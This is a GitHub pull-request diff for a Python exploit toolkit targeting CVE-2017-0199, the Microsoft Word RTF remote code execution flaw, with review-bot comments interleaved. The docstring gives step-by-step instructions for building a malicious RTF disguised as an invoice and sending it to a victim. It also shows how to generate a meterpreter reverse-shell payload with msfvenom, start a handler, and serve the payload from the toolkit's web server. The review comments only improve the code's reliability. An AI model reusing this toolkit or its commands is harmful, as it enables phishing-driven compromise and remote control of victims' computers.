Merge pull request #4 from bhdresh/v2.0-beta-2
V2.0 beta 2
bhdresh committed Apr 19, 2017
2 parents 3cad9a3 + 666d49b commit cac2510
Showing 2 changed files with 127 additions and 14 deletions.
6 changes: 5 additions & 1 deletion README.md
@@ -2,13 +2,17 @@

Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.

### Video tutorial

https://youtu.be/42LjG7bAvpg

### Release note:

Introduced following capabilities to the script

- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13

### Future release:

@@ -79,7 +83,7 @@ Working on following feature

-p <TCP port:Default 80> Local port number.

-e <http://example.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.

-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).

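Review bot: the -e example URL is changed from example.com to attacker.com. example.com is reserved by RFC 2606 specifically for documentation, whereas attacker.com is a live domain registered by an unrelated third party; a reader who copy-pastes the example will point the tool at someone else's host. Keep the placeholder on example.com (or a name under the reserved .example / .invalid TLDs) in both this README line and the matching line in the script docstring.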
135 changes: 122 additions & 13 deletions cve-2017-0199_toolkit.py
@@ -1,3 +1,96 @@
'''
## Exploit toolkit CVE-2017-0199 - v2.0 (https://github.com/bhdresh/CVE-2017-0199) ##
Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payload to victim without any complex configuration.
### Release note:
Introduced following capabilities to the script
- Generate Malicious RTF file using toolkit
- Run toolkit in an exploitation mode as tiny HTA + Web server
Version: Python version 2.7.13
### Future release:
Working on following feature
- Automatically send generated malicious RTF to victim using email spoofing
### Example:
- Step 1: Generate malicious RTF file using following command and send it to victim
Syntax:
# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>
Example:
# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
- Step 2 (Optional, if using MSF Payload) : Generate metasploit payload and start handler
Example:
Generate Payload:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
Start Handler:
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
- Step 3: Start toolkit in exploitation mode to deliver payloads
Syntax:
# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>
Example:
# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
### Command line arguments:
# python cve-2017-0199_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)
Modes:
-M gen Generate Malicious RTF file only
Generate malicious RTF file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.hta> The path to an hta file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and
will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Local path of an executable file / meterpreter shell / payload (If payload is hosted locally).
'''

import os,sys,thread,socket,sys,getopt

BACKLOG = 50 # how many pending connections queue will hold
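Review bot: the import line `import os,sys,thread,socket,sys,getopt` imports sys twice; drop the duplicate. The new module docstring also copies the README usage text verbatim, and the two copies have already diverged (the README gained a "Video tutorial" section that the docstring lacks), so they will keep drifting; keep the usage text in one place, for example by having the `-h` branch print `__doc__`, and let the README link to it.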
@@ -11,17 +104,19 @@ def main(argv):
global docuri
global payloadurl
global payloadlocation
global mode
filename = ''
docuri = ''
payloadurl = ''
payloadlocation = ''
port = int("80")
host = ''
mode = ''
# Capture command line arguments
try:
opts, args = getopt.getopt(argv,"hM:w:u:p:e:l:",["mode=","filename=","docuri=","port=","payloadurl=","payloadlocation="])
except getopt.GetoptError:
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
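Review bot: the renamed usage message `print 'Usage: python '+sys.argv[0]+' -h'` is now repeated in six places across this and the next hunk; factor it into a single `usage()` helper that prints and exits, so the next wording change does not need six edits. Unrelated but in the same context lines, `port = int("80")` is just `port = 80`.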
@@ -53,23 +148,27 @@ def main(argv):
payloadlocation = arg
if "gen" in mode:
if (len(filename)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(docuri)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
print "Generating payload"
generate_exploit_rtf()
mode = 'Finished'
if "exp" in mode:
if (len(payloadurl)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
if (len(payloadlocation)<1):
print 'Help: python '+sys.argv[0]+' -h'
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
print "Running exploit mode - waiting for victim to connect"
exploitation()

mode = 'Finished'
if not "Finished" in mode:
print 'Usage: python '+sys.argv[0]+' -h'
sys.exit()
def generate_exploit_rtf():
# Preparing malicious Doc
s = docuri
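Review bot: mode dispatch uses substring tests (`if "gen" in mode:`, `if "exp" in mode:`, `if not "Finished" in mode:`) and overwrites `mode` with the sentinel string 'Finished' to remember that a branch ran. Substring matching accepts inputs such as `-M generate` or `-M expgen` silently, and reusing the option variable as a flag makes the final check hard to follow. Compare for equality and use an explicit chain instead: `if mode == 'gen': ... elif mode == 'exp': ... else: usage()`, which also removes the need for the sentinel.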
@@ -151,17 +250,27 @@ def server_thread(conn, client_addr):
try:
request = conn.recv(MAX_DATA_RECV)
if (len(request) > 0):
# parse the first line
# parse the first line
first_line = request.split('\n')[0]

# get method
# get method
method = first_line.split(' ')[0]
# get url
url = first_line.split(' ')[1]
# get url
try:
url = first_line.split(' ')[1]
except IndexError:
print "Invalid request from "+client_addr[0]
conn.close()
sys.exit(1)
check_exe_request = url.find('.exe')
if (check_exe_request > 0):
print "Received request for payload from "+client_addr[0]
size = os.path.getsize(payloadlocation)
try:
size = os.path.getsize(payloadlocation)
except OSError:
print "Unable to read"+payloadlocation
conn.close()
sys.exit(1)
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 18:56:41 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 16:56:22 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: "+str(size)+"\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/x-msdos-program\r\n\r\n"
with open(payloadlocation) as fin:
data +=fin.read()
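Review bot: the two new error handlers (`except IndexError` and `except OSError`) end with `sys.exit(1)`, but this code runs in a worker thread, where SystemExit only terminates that thread, not the process; the intent is clearly "stop handling this connection", so `return` after `conn.close()` says that directly and avoids the misleading exit code. Also, `print "Unable to read"+payloadlocation` is missing a space before the path, and since the file is served as a binary it should be opened with `open(payloadlocation, 'rb')`, otherwise text-mode newline translation corrupts it when the tool is run on Windows.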
@@ -183,7 +292,7 @@ def server_thread(conn, client_addr):
data = "HTTP/1.1 200 OK\r\nDate: Sun, 16 Apr 2017 17:11:03 GMT\r\nServer: Apache/2.4.25 (Debian)\r\nLast-Modified: Sun, 16 Apr 2017 17:30:47 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 315\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/doc\r\n\r\n"
conn.send(data)
conn.close()
sys.exit(1)
sys.exit(1)
except socket.error, ex:
print ex
if __name__ == '__main__':
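Review bot: the re-indented `sys.exit(1)` after `conn.close()` has the same problem as the handlers above: inside a thread it raises SystemExit, which `except socket.error, ex:` does not catch, and it simply ends the thread, so `return` is the clearer choice. The `except socket.error, ex:` form is Python 2-only syntax; `except socket.error as ex:` works on 2.7.13 as well and keeps the file parseable under Python 3.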